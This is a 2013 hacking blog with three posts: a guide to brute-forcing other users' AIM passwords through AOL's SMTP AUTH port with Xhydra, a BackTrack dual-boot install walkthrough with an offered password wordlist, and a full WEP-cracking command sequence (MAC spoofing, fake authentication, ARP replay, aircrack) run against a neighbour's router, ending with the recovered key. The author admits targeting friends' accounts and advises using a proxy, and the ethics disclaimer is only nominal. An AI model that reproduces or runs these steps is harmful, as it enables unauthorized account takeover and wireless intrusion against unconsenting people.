Saturday, April 27, 2013

Using Xhydra to hack AIM (Aol Instant Messenger) screen names.

I really Love Backtrack 5 and all the tools it comes with, Metasploit, Xhydra, Nmap, some of the most popular. But there's nothing i enjoy more than the feeling of success, the feeling you get when your hard work finally pays off, and the password goes through. I had a lot of fun doing this as a password pentester back in my younger days. i was surprised at just how easy it was to get peoples passwords using a brute forcer and the right server configuration. i was popular on AIM. i had over 160 friends, and what that meant is that i had over 160 active screen names to try and get the password to!
Here's how it's done.
Fire up a terminal, zenmap and Xhydra

ping smtp.aol.com your output should look like this:
In some circumstances the IP address will be different. i will supply you with the correct one; but hypothetically any IP address will work

step 1. ping smtp.aol.com (64.12.175.136)

step 2. port scan the IP address and verify port 587 (SMTP AUTH) is open

step 3. input data into Xhydra
-target tab-
single target: 64.12.175.136
port: 587
service: smtp


-password tab-
username: programmerdemon (or any screenname)
password: passwordlist (i have my own)
*others can be found in /root/pentest/passwords/wordlist/
*or/root/pentest/passwords/john/password.lst
*or Here 


 -tuning tab-
about 8 tasks should be fine
 -start-

it was my screenname so i didn't show the password. also, you may want to use a proxy. any questions don't hesitate to email.
Thanks! 
 

 

Friday, April 26, 2013

Installing Backtrack 5 R3 to hard drive and Dual boot with Windows.

Believe it or not - a few of my readers are having a hard time with this. it's ok. I was there, many times before. Fortunately, Backtrack 5 is relatively easy to install to your hard drive and make bootable. I remember before Backtrack there was a linux distribution called P.H.L.A.K. Acronym for "Professional Hackers Linux Assault Kit". anyway, it was nearly impossible during the first few releases to install to the hard disk. you had to manually partition the drive yourself, configure the boot loader yourself and then hope that you don't lose any data creating the swap and Ext partitions. Backtrack 5 does it all automatically. I have a few pictures (taken with a smartphone) to help guide the way for you.
I highly advise installing backtrack 5 to the hard drive. the CD loader takes waaay to long to get anything done and you really don't need to use a whole lot of hard drive space.

First thing you need is a computer running backtrack 5 on a live DVD
 Then all you have to do is click the Install Backtrack icon



 Starting here:
go through each step
Step 1, 2 and 3 are Language, Time zone and keyboard layout.
After that, it can be a bit tricky re-sizing and partitioning the drive


What you want to do here is click "Install them side by side, choosing between them each startup"
what this will do is keep your windows or other OS partitions but resize them, making available disc space to install backtrack 5 on. at the bottom of the screen there is a slider - on the right side slide the slider to desired size of your backtrack partition. i chose 40.1gb. That's plenty for me. unless you're going to be keeping a lot of files and saving music and images, you really shouldn't need more than 30gb's.

click forward, then continue. the setup will then install backtrack after partitioning the drive
Keep in mind, the new boot loader will have BT5 as first  option by default. just hit the down arrow to select your other os.
All questions are welcome to email

davidjgeraway@gmail.com 

Wordlist to start with for passwords

 Due to the recent popularity of this post and through multiple complaints that people don't wan't to spend the 30 seconds to copy/paste out of a page and make their own document, i have provided a download link to the .txt. I'm not too familiar with google docs, so please don't try any XSS with the provided link to the PW list.
BASIC PASSWORD FILE

Tuesday, January 1, 2013

Cracking WEP with BackTrack

I admit, one of my favorite things to do in backtrack is to crack a good ole WIFI. It can lead to so many different options and really brings me back to my roots as to why i stumbled upon backtrack in the first place. I guess it's just thrilling, it gives me  sort of a high to be in places i shouldn't. To be able to completely exploit an entire network as a local user is definitely something that's fun an exciting. I do want to stress the fact that even though we've all maybe done it once or twice, Black Hat hacking is entirely unethical and not condoned here. I may sound hypocritical, but i do not do anything malicious to the machines i exploit. I have permission to do so. This is an Ethical Hackers website for information and security purposes only.
I'm Far from a pro-hacker. I'm Maybe intermediate at best. if anything looks out of the ordinary feel free to email me with any questions or tips. I don't claim to be the best; i'm still learning. However, what i have learned thus far i'm willing to share so here goes:

Today I'm going to demonstrate how insecure the WEP encryption is through wifi. In Today's world you have a lot of people that like to set it and forget it. I'm sure most readers have heard of Verizon, a poineer in telecom. Well in my area Verizon offers high speed internet DSL and FIOS. Great service most of the time. The problem is their Westell DSL modems/WIFI routers come preset to use the WEP encryption. I really wish they would catch on to this. My neighbor has DSL through Verizon. Westell Modem, WEP WIFI!
lets see what we can do!
We will be using the AIR tools, fun fun.

Fire up a shell and run commands as following

1. airmon-ng

 wlan1 is my interface. these can be variable so yours may be different

next, with the information airmon has given you (wlan1) for an interface you want to run these 4 commands.

1. airmon-ng stop wlan1     (Stops the wlan1 interface)
2. ifconfig wlan1 down        (wlan1 no longer in use)
3. macchanger --mac 00:11:22:33:44:55 wlan1 (spoofs the mac address)
4. airmon-ng start wlan1      (restarts the interface with new mac)
Below is what it looked like for me.

In Some situations your Network adapter may not be supported. i will compile a list of supported network adapters in the future. or you can google it.
I have this one:


 


 
However if it did work then you have successfully faked the mac and it's time to keep on moving.
Next thing; and this is obviously important, is to pick a network. do this by running this command

1. airodump-ng wlan1 (MAKE SURE YOUR USING YOUR INTERFACE)

after you run the command, wait a few minutes to get an accurate read on what's out there for wireless networks. hit CTRL+C to cancel the running application and choose a good network that is WEP
i have the network i want to crack in my crosshairs. It's highlighted below:
The next thing we must do is configure airodump-ng to watch that specific network and capture the unique data holding the password and put it into a file (hackedwifi) or whatever you decide to name it.
the command is as follows:

1. airodump-ng -c (channel) -w (filename) --bssid (bssid) (interface)

for me it looks like this:
airodump-ng -c 6 -w hackedwifi --bssid 00:12:0E:55:29:13 wlan1


This is what your output should look like:

 
Keep in mind rather than opening several terminals i like to tab them using CTRL+SHIFT+T
While you have airodump running,  in a seperate terminal run this command

1. aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) (interface)

for me the command looks like this

aireplay-ng -1 0 -a 00:12:0E:55:29:13 -h 00:11:22:33:44:55 -e 06B409983674 wlan1

In most cases, and in what you want to happen is output saying "association successful" with a smiley face. This is good and if you get this output you are on the right track. If not email me and i will feel free to help you out
.


Now that you are associated with the Access point we need to use aireplay-ng to create an abundance of data on the network so we can sniff out the encrypted PW. Run this command:

1. aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (interface)

for me it looks like this:
aireplay-ng -3 -b 00:12:0E:55:29:13 -h 00:11:22:33:44:55 wlan1

 

Now it's time to wait. You will notice Airodump going crazy collecting data. Personally, sometimes i leave the room or go do something else for about 20 minutes. What you want is to collect enough Data for the cracker. watch the #Data column. i like to wait until it's between 10,000 and 20,000 before i run the cracker.

Ok, it's been about a half hr and it's time to run the cracker. run this command.

1. aircrack-ng -b (bssid) (filename-01.cap)

if you forgot yourfile just type "dir" and it will be a .cap file.
mine looks like this
aircrack-ng -b 00:12:0E:55:29:13 hackedwifi-01.cap
If you did not sniff enough data it will look like this:
  And IF you did it will look like this:

 The Key to the wireless network is: 6HSKV
to prove it worked i took a screenshot in win7




Happy Hacking!

questions email me: davidjgeraway@gmail.com


 






  w